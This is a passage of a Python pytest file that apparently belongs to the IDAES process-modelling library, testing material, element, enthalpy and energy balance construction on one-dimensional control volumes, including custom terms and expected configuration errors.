m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
m.fs.cv.test_var = Var(m.fs.cv.flowsheet().config.time,
m.fs.pp.component_list)
def custom_method(t, x, j):
return m.fs.cv.test_var[t, j]*units.mol/units.s/units.m
for t in m.fs.time:
for x in m.fs.cv.length_domain:
m.fs.cv.properties[t, x].mw_comp = Var(
m.fs.cv.properties[t, x].config.parameters.component_list,
units=units.kg/units.mol)
mb = m.fs.cv.add_total_component_balances(custom_molar_term=custom_method)
assert isinstance(mb, Constraint)
assert len(mb) == 2
assert_units_consistent(m)
@pytest.mark.unit
def test_add_total_component_balances_custom_molar_term_undefined_basis():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.pp.basis_switch = 3
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
m.fs.cv.test_var = Var(m.fs.cv.flowsheet().config.time,
m.fs.pp.component_list)
def custom_method(t, x, j):
return m.fs.cv.test_var[t, j]
with pytest.raises(ConfigurationError):
m.fs.cv.add_total_component_balances(custom_molar_term=custom_method)
@pytest.mark.unit
def test_add_total_component_balances_custom_mass_term():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.pp.basis_switch = 2
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
m.fs.cv.test_var = Var(m.fs.cv.flowsheet().config.time,
m.fs.pp.component_list)
def custom_method(t, x, j):
return m.fs.cv.test_var[t, j]*units.kg/units.s/units.m
mb = m.fs.cv.add_total_component_balances(custom_mass_term=custom_method)
assert isinstance(mb, Constraint)
assert len(mb) == 2
assert_units_consistent(m)
@pytest.mark.unit
def test_add_total_component_balances_custom_mass_term_no_mw():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.pp.basis_switch = 1
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
m.fs.cv.test_var = Var(m.fs.cv.flowsheet().config.time,
m.fs.pp.component_list)
def custom_method(t, x, j):
return m.fs.cv.test_var[t, j]
with pytest.raises(PropertyNotSupportedError):
m.fs.cv.add_total_component_balances(custom_mass_term=custom_method)
@pytest.mark.unit
def test_add_total_component_balances_custom_mass_term_mole_flow_basis():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.pp.basis_switch = 2
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
m.fs.cv.test_var = Var(m.fs.cv.flowsheet().config.time,
m.fs.pp.component_list)
def custom_method(t, x, j):
return m.fs.cv.test_var[t, j]*units.kg/units.s/units.m
for t in m.fs.time:
for x in m.fs.cv.length_domain:
m.fs.cv.properties[t, x].mw_comp = Var(
m.fs.cv.properties[t, x].config.parameters.component_list,
units=units.kg/units.mol)
mb = m.fs.cv.add_total_component_balances(custom_mass_term=custom_method)
assert isinstance(mb, Constraint)
assert len(mb) == 2
assert_units_consistent(m)
@pytest.mark.unit
def test_add_total_component_balances_custom_mass_term_undefined_basis():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.pp.basis_switch = 3
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
m.fs.cv.test_var = Var(m.fs.cv.flowsheet().config.time,
m.fs.pp.component_list)
def custom_method(t, x, j):
return m.fs.cv.test_var[t, j]
with pytest.raises(ConfigurationError):
m.fs.cv.add_total_component_balances(custom_mass_term=custom_method)
# -----------------------------------------------------------------------------
# Test add_total_element_balances
@pytest.mark.unit
def test_add_total_element_balances_default():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
mb = m.fs.cv.add_total_element_balances()
assert isinstance(mb, Constraint)
assert len(mb) == 3
for j in m.fs.pp.element_list:
with pytest.raises(KeyError):
assert m.fs.cv.element_balances[0, 0, j]
assert type(m.fs.cv.element_balances[0, 1, j]) is \
_GeneralConstraintData
assert_units_consistent(m)
@pytest.mark.unit
def test_add_total_element_balances_default_FFD():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "FORWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
mb = m.fs.cv.add_total_element_balances()
assert isinstance(mb, Constraint)
assert len(mb) == 3
for j in m.fs.pp.element_list:
with pytest.raises(KeyError):
assert m.fs.cv.element_balances[0, 1, j]
assert type(m.fs.cv.element_balances[0, 0, j]) is \
_GeneralConstraintData
assert_units_consistent(m)
@pytest.mark.unit
def test_add_total_element_balances_distrubuted_area():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10,
"area_definition": DistributedVars.variant})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
mb = m.fs.cv.add_total_element_balances()
assert isinstance(mb, Constraint)
assert len(mb) == 3
assert_units_consistent(m)
@pytest.mark.unit
def test_add_total_element_balances_properties_not_supported():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.pp.del_component(m.fs.pp.element_list)
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
with pytest.raises(PropertyNotSupportedError):
m.fs.cv.add_total_element_balances()
@pytest.mark.unit
def test_add_total_element_balances_dynamic():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": True, "time_units": units.s})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10,
"dynamic": True})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
mb = m.fs.cv.add_total_element_balances()
assert isinstance(mb, Constraint)
assert len(mb) == 6
assert isinstance(m.fs.cv.phase_fraction, Var)
assert isinstance(m.fs.cv.element_holdup, Var)
assert isinstance(m.fs.cv.element_accumulation, Var)
assert_units_consistent(m)
@pytest.mark.unit
def test_add_total_element_balances_rate_rxns():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
with pytest.raises(ConfigurationError):
m.fs.cv.add_total_element_balances(has_rate_reactions=True)
@pytest.mark.unit
def test_add_total_element_balances_eq_rxns():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
with pytest.raises(ConfigurationError):
m.fs.cv.add_total_element_balances(has_equilibrium_reactions=True)
@pytest.mark.unit
def test_add_total_element_balances_phase_eq():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
with pytest.raises(ConfigurationError):
m.fs.cv.add_total_element_balances(has_phase_equilibrium=True)
@pytest.mark.unit
def test_add_total_element_balances_mass_transfer():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
mb = m.fs.cv.add_total_element_balances(has_mass_transfer=True)
assert isinstance(mb, Constraint)
assert len(mb) == 3
assert isinstance(m.fs.cv.elemental_mass_transfer_term, Var)
assert_units_consistent(m)
@pytest.mark.unit
def test_add_total_element_balances_custom_term():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
m.fs.cv.test_var = Var(m.fs.cv.flowsheet().config.time,
m.fs.pp.element_list)
def custom_method(t, x, e):
return m.fs.cv.test_var[t, e]*units.mol/units.s/units.m
mb = m.fs.cv.add_total_element_balances(
custom_elemental_term=custom_method)
assert isinstance(mb, Constraint)
assert len(mb) == 3
assert_units_consistent(m)
@pytest.mark.unit
def test_add_total_element_balances_lineraly_dependent(caplog):
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
# Change elemental composition to introduce dependency
m.fs.pp.element_comp = {"c1": {"H": 0, "He": 0, "Li": 1},
"c2": {"H": 1, "He": 2, "Li": 0}}
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
mb = m.fs.cv.add_total_element_balances()
# Check that logger message was recorded and has the right level
msg = ("fs.cv detected linearly dependent element balance equations. "
"Element balances will NOT be written for the following elements: "
"['He']")
assert msg in caplog.text
for record in caplog.records:
assert record.levelno == idaeslog.INFO_LOW
assert isinstance(mb, Constraint)
assert len(mb) == 2
for i in mb:
# Should be no constraints at x = 0
# H and Li are not lineraly dependent and should have constraints
# He is lineraly dependent on H and should be skipped
assert i in [(0, 1, "H"), (0, 1, "Li")]
assert_units_consistent(m)
# -----------------------------------------------------------------------------
# Test unsupported material balance types
@pytest.mark.unit
def test_add_total_material_balances():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.pp.del_component(m.fs.pp.phase_equilibrium_idx)
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=True)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
with pytest.raises(BalanceTypeNotSupportedError):
m.fs.cv.add_total_material_balances()
# -----------------------------------------------------------------------------
# Test add_energy_balances default
@pytest.mark.unit
def test_add_energy_balances_default_fail():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
m.fs.pp.default_balance_switch = 2
with pytest.raises(ConfigurationError):
m.fs.cv.add_energy_balances(EnergyBalanceType.useDefault)
@pytest.mark.unit
def test_add_energy_balances_default():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
eb = m.fs.cv.add_energy_balances(EnergyBalanceType.useDefault)
assert isinstance(eb, Constraint)
assert len(eb) == 1
assert isinstance(m.fs.cv._enthalpy_flow, Var)
assert isinstance(m.fs.cv.enthalpy_flow_linking_constraint, Constraint)
assert isinstance(m.fs.cv.enthalpy_flow_dx, DerivativeVar)
with pytest.raises(KeyError):
assert m.fs.cv.enthalpy_balances[0, 0]
assert type(m.fs.cv.enthalpy_balances[0, 1]) is \
_GeneralConstraintData
assert_units_consistent(m)
# -----------------------------------------------------------------------------
# Test phase enthalpy balances
@pytest.mark.unit
def test_add_total_enthalpy_balances_default():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
eb = m.fs.cv.add_total_enthalpy_balances()
assert isinstance(eb, Constraint)
assert len(eb) == 1
assert isinstance(m.fs.cv._enthalpy_flow, Var)
assert isinstance(m.fs.cv.enthalpy_flow_linking_constraint, Constraint)
assert isinstance(m.fs.cv.enthalpy_flow_dx, DerivativeVar)
with pytest.raises(KeyError):
assert m.fs.cv.enthalpy_balances[0, 0]
assert type(m.fs.cv.enthalpy_balances[0, 1]) is \
_GeneralConstraintData
assert_units_consistent(m)
@pytest.mark.unit
def test_add_total_enthalpy_balances_default_FFD():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "FORWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
eb = m.fs.cv.add_total_enthalpy_balances()
assert isinstance(eb, Constraint)
assert len(eb) == 1
assert isinstance(m.fs.cv._enthalpy_flow, Var)
assert isinstance(m.fs.cv.enthalpy_flow_linking_constraint, Constraint)
assert isinstance(m.fs.cv.enthalpy_flow_dx, DerivativeVar)
with pytest.raises(KeyError):
assert m.fs.cv.enthalpy_balances[0, 1]
assert type(m.fs.cv.enthalpy_balances[0, 0]) is \
_GeneralConstraintData
assert_units_consistent(m)
@pytest.mark.unit
def test_add_total_enthalpy_balances_distributed_area():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10,
"area_definition": DistributedVars.variant})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
eb = m.fs.cv.add_total_enthalpy_balances()
assert isinstance(eb, Constraint)
assert len(eb) == 1
assert isinstance(m.fs.cv._enthalpy_flow, Var)
assert isinstance(m.fs.cv.enthalpy_flow_linking_constraint, Constraint)
assert isinstance(m.fs.cv.enthalpy_flow_dx, DerivativeVar)
assert_units_consistent(m)
@pytest.mark.unit
def test_add_total_enthalpy_balances_dynamic():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": True, "time_units": units.s})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10,
"dynamic": True})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
mb = m.fs.cv.add_total_enthalpy_balances()
assert isinstance(mb, Constraint)
assert len(mb) == 2
assert isinstance(m.fs.cv.phase_fraction, Var)
assert isinstance(m.fs.cv.energy_holdup, Var)
assert isinstance(m.fs.cv.energy_accumulation, Var)
assert_units_consistent(m)
@pytest.mark.unit
def test_add_total_enthalpy_balances_heat_transfer():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
mb = m.fs.cv.add_total_enthalpy_balances(has_heat_transfer=True)
assert isinstance(mb, Constraint)
assert len(mb) == 1
assert isinstance(m.fs.cv.heat, Var)
assert_units_consistent(m)
@pytest.mark.unit
def test_add_total_enthalpy_balances_work_transfer():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
mb = m.fs.cv.add_total_enthalpy_balances(has_work_transfer=True)
assert isinstance(mb, Constraint)
assert len(mb) == 1
assert isinstance(m.fs.cv.work, Var)
assert_units_consistent(m)
@pytest.mark.unit
def test_add_total_enthalpy_balances_enthalpy_transfer():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
mb = m.fs.cv.add_total_enthalpy_balances(has_enthalpy_transfer=True)
assert isinstance(mb, Constraint)
assert len(mb) == 1
assert isinstance(m.fs.cv.enthalpy_transfer, Var)
assert_units_consistent(m)
@pytest.mark.unit
def test_add_total_enthalpy_balances_custom_term():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
m.fs.cv.test_var = Var(m.fs.cv.flowsheet().config.time)
def custom_method(t, x):
return m.fs.cv.test_var[t]*units.J/units.s/units.m
mb = m.fs.cv.add_total_enthalpy_balances(custom_term=custom_method)
assert isinstance(mb, Constraint)
assert len(mb) == 1
assert_units_consistent(m)
@pytest.mark.unit
def test_add_total_enthalpy_balances_dh_rxn_no_extents():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
with pytest.raises(ConfigurationError):
m.fs.cv.add_total_enthalpy_balances(has_heat_of_reaction=True)
@pytest.mark.unit
def test_add_total_enthalpy_balances_dh_rxn_rate_rxns():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
m.fs.cv.add_phase_component_balances(has_rate_reactions=True)
m.fs.cv.add_total_enthalpy_balances(has_heat_of_reaction=True)
assert isinstance(m.fs.cv.heat_of_reaction, Expression)
assert_units_consistent(m)
@pytest.mark.unit
def test_add_total_enthalpy_balances_dh_rxn_equil_rxns():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=True)
m.fs.cv.add_phase_component_balances(has_equilibrium_reactions=True)
m.fs.cv.add_total_enthalpy_balances(has_heat_of_reaction=True)
assert isinstance(m.fs.cv.heat_of_reaction, Expression)
assert_units_consistent(m)
# -----------------------------------------------------------------------------
# Test unsupported energy balance types
@pytest.mark.unit
def test_add_phase_enthalpy_balances():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.pp.del_component(m.fs.pp.phase_equilibrium_idx)
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=True)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
with pytest.raises(BalanceTypeNotSupportedError):
m.fs.cv.add_phase_enthalpy_balances()
@pytest.mark.unit
def test_add_phase_energy_balances():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.pp.del_component(m.fs.pp.phase_equilibrium_idx)
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=True)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
with pytest.raises(BalanceTypeNotSupportedError):
m.fs.cv.add_phase_energy_balances()
@pytest.mark.unit
def test_add_total_energy_balances():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.pp.del_component(m.fs.pp.phase_equilibrium_idx)
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=True)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
with pytest.raises(BalanceTypeNotSupportedError):
m.fs.cv.add_total_energy_balances()
# -----------------------------------------------------------------------------
# Test add total pressure balances
@pytest.mark.unit
def test_add_total_pressure_balances_default():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
